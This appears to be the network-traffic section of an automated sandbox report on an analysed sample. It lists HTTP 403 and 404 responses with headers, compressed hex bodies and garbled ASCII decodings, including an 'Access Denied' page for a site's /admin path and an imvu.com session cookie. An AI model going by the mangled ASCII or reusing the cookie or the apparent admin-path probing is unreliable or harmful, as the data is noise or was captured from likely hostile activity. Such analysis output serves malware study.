d9 55 7d 3f f5 cd 65 de ef ec 37 26 f0 f8 52 c6 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 22fSmo0+463eI6Q }sO`(8igB3?s{<-tUNK`RJl6_m(^F4I'J]54GW]^vHJk()jLIoMRI-yiw(593^8up-w%\Djhe>6(F]+?Jy]o|}?s(sb. <?N;;3Y/Rge3R_!-a3z*R/rm2rHb3!{g@gDfz5[7d[RuM HDuT9A[msB?L7.Y.SelLh<cF3tU.7oMC-CXc%vF>F;*qU}?e7&R0
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:16:21 GMTVary: Accept-EncodingServer: cloudflareCF-RAY: 850abd42fdef673d-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 38 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 6d 6f db 38 12 fe ee 5f 31 d5 2d 22 1b b0 64 a7 2f db 5c 2c f9 b0 9b 66 71 01 da 6e 6f 9b 62 af 28 0a 83 22 47 16 13 8a d4 91 b4 1d 6f ea ff 7e a0 28 39 f2 4b b2 5b dc 01 01 62 92 c3 87 33 cf bc 90 a3 e4 d9 9b 5f 2f ae 3f 7f b8 84 c2 96 62 da 4b 9e 45 d1 17 9e 83 b0 70 75 09 af bf 4e 21 71 0b 40 05 31 26 0d a4 8a 6e 0c 70 fc 11 94 60 1c 03 10 44 ce d3 00 65 f4 e9 63 30 85 e4 d9 17 94 8c e7 5f a3 e8 01 aa c1 01 38 0e f5 fa fb a0 ce 9e 80 3a fb 0e a8 b9 6d d0 dc c4 31 2b 0f 51 a2 68 17 a9 40 c2 a6 bd c4 72 2b 70 fa 93 b5 28 2d 57 12 7e c3 ff 2c b8 46 f6 0c be c1 85 50 0b 96 0b a2 31 19 79 b9 5e 52 a2 25 40 0b a2 0d da 34 f8 74 fd 4b 74 16 c0 a8 5d 28 ac ad 22 87 b0 4c 83 0b 25 1d 68 74 bd ae 30 00 ea 47 69 60 f1 ce 8e 9c be 93 2d cc 53 28 ff 8e 3e fd 14 5d a8 b2 22 96 67 a2 0b 74 75 99 5e b2 39 76 f6 49 52 62 1a 68 95 29 6b 3a 82 52 71 c9 f0 6e 08 52 e5 4a 08 b5 3a d8 b2 e4 b8 aa 94 b6 9d 4d 2b ce 6c 91 32 5c 72 8a 51 3d 18 72 c9 2d 27 22 32 94 08 4c 4f 3d 8a e0 f2 16 34 8a 34 30 76 2d d0 14 88 36 00 ce d2 80 e6 33 3f 15 51 63 02 28 34 e6 69 30 a2 4c 46 74 ce 47 7e 69 44 f3 18 b5 56 da c4 b5 d0 68 3f 86 ff fe 75 fa f8 11 e1 c3 11 1c dd 29 e1 9f 9e c2 b1 3d 68 37 1a 6a c1 69 a6 d8 fa be 24 7a ce e5 f9 78 52 11 c6 b8 9c 9f 8f 37 89 07 9a f6 7a 9d 08 44 a7 df e9 b8 89 c1 5e 62 a8 e6 95 9d f6 00 78 0e fd 67 92 2c f9 9c 58 a5 63 aa d4 2d c7 4b 49 32 81 6c 00 f7 3d 97 02 2b 2e 99 5a c5 84 b1 cb 25 4a fb 96 1b 8b 12 75 3f 7c f3 eb bb 26 72 de 2a c2 90 85 43 c8 17 92 d6 c1 d9 6f 77 03 2c 89 86 06 58 40 0a 4c d1 45 89 d2 c6 73 b4 97 02 dd cf 9f d7 57 ac 1f 7a 99 88 08 d4 36 1c 4c 9a dd ed ce b8 b6 2b 66 dc 54 82 ac 21 85 30 13 8a de 86 5e 6e 33 e8 01 6c 7a c9 a8 35 ed 20 8b 7a bd 64 d4 24 92 e3 ce 19 9f 30 be 6c fc 1f ad 34 a9 2a d4 c1 b4 86 ab 57 9a 24 a5 b9 57 09 da 1f 51 ed 20 37 6c 34 ae c7 4d 24 75 6c 08 80 11 4b 22 ab 89 34 82 58 74 29 ee 88 9d 79 21 13 4c 3f 08 24 06 c1 4f 37 96 9a 38 19 31 be ec e8 d1 68 58 9f 12 31 b4 84 0b 97 33 5b ed 76 16 f6 0c 39 30 a5 59 76 da 3b 36 fc 2f 8f a0 96 a8 5d 7a 6d b7 ba ea 77 7a 60 44 4d fb cc 6d 16 5c 62 30 fd a8 b4 5e 0f 61 ad 16 50 90 25 42 86 28 a1 16 42 96 8c 8a d3 2e da f3 8e 26 66 91 3d 80 24 a6 22 f2 e0 a8 85 e7 cb aa 19 a1 14 8d 09 a6 9f d5 02 88 46 f0 2b 60 15 f8 95 64 e4 00 a6 40 16 56 b9 f8 88 a9 2b 88 c9 a8 78 be e5 a1 66 d5 85 05 8c e2 c6 f4 3a 2e 8e d2 64 d0 87 b1 a3 89 cf 0b c1 e7 85 ed f2 72 94 d4 8e c0 21 20 d5 88 d2 14 ca 46 ae 70 11 2e 3d f5 9d f9 7c 21 c4 0e 04 c0 ce 00 c0 b3 f4 00 2a 55 67 3f f8 30 9c 36 54 3c 86 d3 89 ae 83 e1 0e 47 9
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:16:21 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qK9PNyzwXathFv3E3jUcK4mRbmY5M9WqFnyeUWG0aNUl9ki6VC%2BBp6ajRMQUMjslVYpXWxl%2BjxOE%2BM1sbJbsmOdiYF9Qwnq%2BlTV9ZqfNTzGVrCDKICObICLlzVJMXTQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abd435c484527-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 63 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f e3 36 12 fd df 9f 62 a2 02 89 0d 44 52 bc 9b 34 b9 58 d6 a1 b7 9b 03 02 6c d1 bd 6e 16 bd 45 b1 30 28 72 64 b1 a1 48 95 a4 ac f8 d2 7c f7 03 45 c9 91 7f 24 ed e2 0e 08 10 51 1c be 99 79 7c 33 22 9d 1c bd ff e9 dd dd 97 8f 37 50 d8 52 a4 a3 e4 28 0c 7f e5 39 08 0b b7 37 70 f9 35 85 c4 4d 00 15 c4 98 79 20 55 f8 9b 01 8e df 83 12 8c 63 00 82 c8 e5 3c 40 19 7e fe 14 a4 90 1c fd 8a 92 f1 fc 6b 18 3e 43 75 38 00 87 a1 2e bf 0d ea ea 15 a8 ab 6f 80 5a da 0e cd bd 38 94 e5 3e 4a 18 6e 23 15 48 58 3a 4a 2c b7 02 d3 1f ac 45 69 b9 92 f0 33 fe 5e 73 8d ec 08 fe 80 77 42 d5 2c 17 44 63 12 7b bb 51 52 a2 25 40 0b a2 0d da 79 f0 f9 ee 9f e1 55 00 71 3f 51 58 5b 85 0e 61 35 0f de 29 e9 40 c3 bb 75 85 01 50 3f 9a 07 16 1f 6c ec e2 9d 6d 60 5e 43 f9 77 f8 f9 87 f0 9d 2a 2b 62 79 26 86 40 b7 37 f3 1b b6 c4 c1 3a 49 4a 9c 07 5a 65 ca 9a 81 a1 54 5c 32 7c 38 05 a9 72 25 84 6a f6 96 ac 38 36 95 d2 76 b0 a8 e1 cc 16 73 86 2b 4e 31 6c 07 a7 5c 72 cb 89 08 0d 25 02 e7 53 8f 22 b8 bc 07 8d 62 1e 18 bb 16 68 0a 44 1b 00 67 f3 80 e6 0b ff 2a a4 c6 04 50 68 cc e7 41 4c 99 0c e9 92 c7 7e 2a a6 79 84 5a 2b 6d a2 d6 28 de d5 f0 df be a6 2f bb 38 79 76 c1 d1 79 39 f9 53 2f 1c 7b 47 db 6a 68 0d d3 4c b1 f5 63 49 f4 92 cb eb b3 59 45 18 e3 72 79 7d f6 94 78 a0 74 34 1a 28 10 5d 7c d3 b3 4e 83 a3 c4 50 cd 2b 9b 8e 00 78 0e e3 23 49 56 7c 49 ac d2 11 55 ea 9e e3 8d 24 99 40 36 81 c7 91 2b 81 86 4b a6 9a 88 30 76 b3 42 69 3f 70 63 51 a2 1e 9f bc ff e9 c7 4e 39 1f 14 61 c8 4e 4e 21 af 25 6d c5 39 ee 57 03 ac 88 86 0e 58 c0 1c 98 a2 75 89 d2 46 4b b4 37 02 dd e3 3f d6 b7 6c 7c e2 6d 42 22 50 db 93 c9 ac 5b dd Data Ascii: 6c6Xo6bDR4XlnE0(rdH|E$Qy|3"7PR(97p5My Uc<@~k>Cu8.oZ8>Jn#HX:J,Ei3^swB,Dc{QR%@yUq?QX[a5)@uP?lm`^Cw*+by&@7:IJZeT\2|8r%j86vs+N1l\r%S"bhDg*PhAL~*yZ+m(/8yvy9S/{GjhLcIYEry}xt4(]|NP+x#IV|IU$@6+K0vBi?pcQN9aNN!%m9WXuFK7?l|mB"P[
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: MEGA-Chrome-AntileakAccess-Control-Max-Age: 86400Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: nginx/1.17.9X-Powered-By: PHP/8.2.4Set-Cookie: osCsid=005c033de8762365d836e38a023bc42d; expires=Mon, 04 Mar 2024 11:16:06 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheSet-Cookie: osCsid=005c033de8762365d836e38a023bc42d; expires=Mon, 04 Mar 2024 11:16:06 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=Nonex-imvu-rnd: ar391KuAO98H7mqEEDsFG14oxgcontent-language: pt-brContent-Encoding: gzipData Raw: 31 32 33 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 3b db 6e db 48 96 ef 06 e6 1f aa 99 ee 96 d4 23 8a d4 c5 b2 24 db 1a c8 97 5c 76 12 27 1b 27 99 1e 64 03 a3 48 16 25 3a 24 8b 61 15 6d b9 3d f9 98 c1 3e 0c 66 81 7d 1a ec cb be fa c7 f6 9c 22 29 91 12 95 d8 dd 4a 63 4d c8 2a d7 e5 dc 6f 55 2c 1f 7c 77 f2 f2 f8 cd 5f 5f 9d 92 99 0c fc f1 c1 77 ba fe de 73 c9 b3 53 32 f8 30 26 f9 cf 01 0e 12 c7 8b 0f 35 5f c6 1a f1 69 38 3d d4 58 a8 bf 3d d7 88 ed 53 21 0e 35 8f 0d b4 31 39 f8 ee 3d 0b 1d cf fd a0 eb 45 60 c3 07 03 1b 6e 00 36 95 19 3c ec 18 57 c3 8a a4 6e c5 6a bd ae 17 61 ec 1c cc 18 75 c6 3b 8a 8a 80 49 0a 4c cb 48 67 9f 12 ef ea 50 fb 59 7f 3b d1 8f 79 10 51 e9 59 3e 03 5a 78 28 59 28 0f b5 67 a7 87 cc 99 42 8f b1 69 ed 71 3a 55 7f 73 13 15 17 4a 36 97 06 92 b8 4f ec 19 8d 05 93 87 6f df 3c d6 07 2b 90 42 1a b0 43 8d 46 91 cf 74 4f 26 21 13 3a fc 51 80 03 7f e9 9e 73 38 6c 0f f7 7a bb 83 5e af 49 b0 87 c6 d3 24 c0 71 a4 44 8c 0c 23 92 2d c1 ec 24 66 2d 2f b8 4a 5a 36 0f 8c 10 29 f8 93 e0 49 6c b3 43 8b 86 21 8b 15 f2 22 e2 29 e7 53 c0 1c f9 f4 a6 1a 2f 00 4a 21 06 dc f2 7c 66 f3 d8 e1 57 74 0d 4e ca 40 3a 47 bf 66 16 02 d3 6d 1a d1 b2 34 6f 98 b8 df 52 21 a9 4c 84 6e d1 18 9a 37 25 18 96 4f ed 8f ba 8c 69 28 fc c4 86 ae ff 87 c4 f8 5e f8 91 c4 cc cf 01 4a 9e d8 33 dd 83 65 1a 11 de 2f 0c cc 7c 77 6f be bb a7 91 59 cc dc 43 0d b5 08 4a 5c d5 20 7c 02 1e 1a d7 9e 9c 05 cc f0 82 a9 e1 d2 2b 84 62 ac 82 d5 15 b8 56 14 4e ef 4d 40 df 9c f7 cd ed 11 a0 c0 3d 88 80 bd ce 7c af b3 3d 02 14 b8 87 11 d0 9f ef f5 b7 48 00 82 7b 10 01 ed 76 6f 0e 9f Data Ascii: 123f;nH#$\v''dH%:$am=>f}")JcM*oU,|w__wsS20&5_i8=X=S!519=E`n6<Wnjau;ILHgPY;yQY>Zx(Y(gBiq:UsJ6Oo<+BCFtO&!:Qs8lz^I$qD#-$f-/JZ6)IlC!")S/J!|fWtN@:Gfm4oR!Ln7%Oi(^J3e/|woYCJ\ |+bVNM@=|=H{vo
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:06 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Thu, 06 Oct 2022 20:52:18 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: AkamaiGHostMime-Version: 1.0Content-Type: text/htmlContent-Length: 264Expires: Mon, 05 Feb 2024 11:16:06 GMTDate: Mon, 05 Feb 2024 11:16:06 GMTConnection: closeServer-Timing: cdn-cache; desc=HITServer-Timing: edge; dur=1Server-Timing: ak_p; desc="1707131766676_1611129006_213793506_17_10936_164_0_-";dur=1Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 48 31 3e 0a 20 0a 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 6e 61 75 6b 72 69 67 75 6c 66 26 23 34 36 3b 63 6f 6d 26 23 34 37 3b 61 64 6d 69 6e 22 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 31 38 26 23 34 36 3b 61 65 65 30 30 37 36 30 26 23 34 36 3b 31 37 30 37 31 33 31 37 36 36 26 23 34 36 3b 63 62 65 33 61 65 32 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Access Denied</TITLE></HEAD><BODY><H1>Access Denied</H1> You don't have permission to access "http&#58;&#47;&#47;naukrigulf&#46;com&#47;admin" on this server.<P>Reference&#32;&#35;18&#46;aee00760&#46;1707131766&#46;cbe3ae2</BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 05 Feb 2024 11:16:06 GMTServer: ApacheUpgrade: h2,h2cConnection: UpgradeLast-Modified: Thu, 06 Oct 2022 20:52:18 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 3e 1d 2e 2c fa db f8 3c c0 57 75 6d 40 32 35 ba 92 8f 94 70 7c 20 e1 38 4a 38 fe a6 2d a6 07 2a a6 51 c5 f4 db aa 58 1c a8 58 44 15 8b 03 15 07 2c 1d 42 ba 22 e2 c0 5e d5 23 8b 6e 14 df 24 fb 75 f1 a5 81 50 01 f0 ff 22 d6 e4 38 7c 5d a9 6e 02 93 fd fd c5 f1 8b ff a8 cf d2 0a 54 71 63 ae a8 b8 bc 85 16 d8 0a 6d 54 88 6a e3 17 60 85 0e bc 08 b5 d2 70 db 77 98 e4 69 73 1f 38 ac 37 72 1b e2 29 88 ce 0a 56 4e fb 99 31 b7 9a 2c cf bd 27 11 27 8d e3 4c 0e 82 e3 65 16 bf 21 b9 72 f9 b6 0e 47 59 ba 77 b2 95 5f be d9 7d 22 01 ae 1b d0 2b 4b a1 7b 07 21 28 51 ef ae 4a 74 ea 79 c4 8d 87 b8 7a f9 4e 79 d0 20 3e 36 20 ee 12 af bd 96 f4 ee 6f 01 81 77 57 a2 f6 a4 1b af 5c 41 62 4d 28 2c b5 58 28 41 8d 70 8d d3 4a c0 16 03 63 73 24 34 78 c6 35 c6 72 19 6e 98 05 96 18 4f 4c 74 83 15 e0 61 f7 17 45 dd de 03 2b 0b 8e a1 83 04 28 1b 6c 44 63 c5 f5 ee da dd 95 c1 82 46 59 5a 0f 87 55 fb b5 56 cc 75 f8 3e 4d 37 9b cd a8 a2 c0 a5 62 f2 23 4d 76 b4 f2 89 60 64 03 79 f2 3a 06 2e ba 40 b2 3c 23 57 c5 c6 4a 3a 0a f1 1b a8 21 b5 b7 1a 43 25 0d 97 11 e3 68 4b 11 bc ee 5d 13 5a 55 42 48 bb 6c 79 df 3f b4 65 22 94 e1 41 eb 41 a7 34 b6 ea 1f c5 a1 df 9b a4 c2 a2 00 17 ef e4 f6 48 c6 c9 f2 51 f9 b3 83 de 5f 54 81 c6 34 f1 86 14 23 39 19 4f ee 46 c7 67 d8 58 2f 3d 84 9a 5c c0 16 c4 5e 69 bf 38 f9 a2 b4 be 77 6f 67 e9 8a 8a cb 68 c6 ab 64 6b a2 f1 2f 66 df cc 8d 39 09 00 00 Data Ascii: nFeE.H:$AX-G;6F)b]M*N9Pfz{wbka+fI|)DV*h[`%t|dklW<#[+Dhr.tCQ)y"lj`U^@s$!
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:16:21 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QvqQ%2FxEnrKR%2F%2BHzb84b6z880W8GyLqGxyi9d8my5iJhBBTbUbwZqNJN7On7QmOmSULYli1fOqVR%2BlQuwt1Y1GuxPOiRNgLhEJ5WpVOMaoq%2FdWaneF%2BE7i213GKAYumaUCQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abd45bf6253b9-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 63 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f e3 b8 11 fd df 9f 62 a2 02 89 0d 58 52 bc bb b9 4d 1c 59 c5 75 37 05 02 6c 71 db db 2c da c5 61 11 50 e4 c8 e2 85 22 55 92 b2 62 a4 f9 ee 05 45 c9 96 7f 24 d7 45 0b 04 88 28 0e df cc 3c be 19 91 4e 4e 3e fe f2 e1 ee db e7 1b 28 6c 29 d2 51 72 12 86 bf f1 1c 84 85 db 1b 78 ff 3d 85 c4 4d 00 15 c4 98 45 20 55 f8 bb 01 8e 3f 81 12 8c 63 00 82 c8 e5 22 40 19 7e fd 12 a4 90 9c fc 86 92 f1 fc 7b 18 6e a1 3a 1c 80 e3 50 ef 7f 0c ea f2 15 a8 cb 1f 80 5a da 0e cd bd 38 96 e5 21 4a 18 ee 22 15 48 58 3a 4a 2c b7 02 d3 9f ad 45 69 b9 92 f0 2b fe ab e6 1a d9 09 fc 1b 3e 08 55 b3 5c 10 8d 49 ec ed 46 49 89 96 00 2d 88 36 68 17 c1 d7 bb bf 86 97 01 c4 fd 44 61 6d 15 3a 84 d5 22 f8 a0 a4 03 0d ef d6 15 06 40 fd 68 11 58 7c b4 b1 8b f7 7a 03 f3 1a ca 3f c3 af 3f 87 1f 54 59 11 cb 33 31 04 ba bd 59 dc b0 25 0e d6 49 52 e2 22 d0 2a 53 d6 0c 0c a5 e2 92 e1 e3 14 a4 ca 95 10 aa 39 58 b2 e2 d8 54 4a db c1 a2 86 33 5b 2c 18 ae 38 c5 b0 1d 4c b9 e4 96 13 11 1a 4a 04 2e 66 1e 45 70 f9 00 1a c5 22 30 76 2d d0 14 88 36 00 ce 16 01 cd ef fd ab 90 1a 13 40 a1 31 5f 04 31 65 32 a4 4b 1e fb a9 98 e6 11 6a ad b4 89 5a a3 78 5f c3 57 df d3 97 5d 9c 6d 5d 70 74 5e ce fe d0 0b c7 de d1 ae 1a 5a c3 34 53 6c fd 54 12 bd e4 72 7e 7e 5d 11 c6 b8 5c ce cf 9f 13 0f 94 8e 46 03 05 a2 8b 6f 76 de 69 70 94 18 aa 79 65 d3 11 00 cf 61 7c 22 c9 8a 2f 89 55 3a a2 4a 3d 70 bc 91 24 13 c8 26 f0 34 72 25 d0 70 c9 54 13 11 c6 6e 56 28 ed 27 6e 2c 4a d4 e3 b3 8f bf fc ad 53 ce 27 45 18 b2 b3 29 e4 b5 a4 ad 38 c7 fd 6a 80 15 d1 d0 01 0b 58 00 53 b4 2e 51 da 68 89 f6 46 a0 7b fc cb fa 96 8d cf bc 4d 48 04 Data Ascii: 6caXobXRMYu7lq,aP"UbE$E(<NN>(l)Qrx=ME U?c"@~{n:PZ8!J"HX:J,Ei+>U\IFI-6hDam:"@hX|z??TY31Y%IR"*S9XTJ3[,8LJ.fEp"0v-6@1_1e2KjZx_W]m]pt^Z4SlTr~~]\Fovipyea|"/U:J=p$&4r%pTnV('n,JS'E)8jXS.QhF{MH
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 05 Feb 2024 11:16:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 05 Feb 2024 11:16:21 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wd%2B8JsgC3Td84n6iMZ6k%2Fapyj9BO%2F1FzrIZn6FWKLe%2Ff8nUOtk%2BwhkQVt2N40O8TRwDmVdYW0CtMQcdOnqxnH3dalpuc4mB3BDqTgFVh6C7Yh4tHph%2Bcx%2BNWH6j%2FmAfaXg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingServer: cloudflareCF-RAY: 850abd45bae21353-ATLContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 36 63 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ad 58 7f 6f e3 b8 11 fd df 9f 62 a2 02 89 0d 58 52 bc bb e9 26 8e ac e2 ba 9b 02 01 b6 b8 ed 6d 16 ed e2 b0 08 28 72 64 f1 42 91 3a 92 b2 62 a4 f9 ee 05 45 c9 96 7f 24 d7 45 0b 04 88 28 0e df cc 3c be 19 91 4e 4e 3e fe fc e1 ee db e7 1b 28 6c 29 d2 51 72 12 86 bf f2 1c 84 85 db 1b 78 ff 3d 85 c4 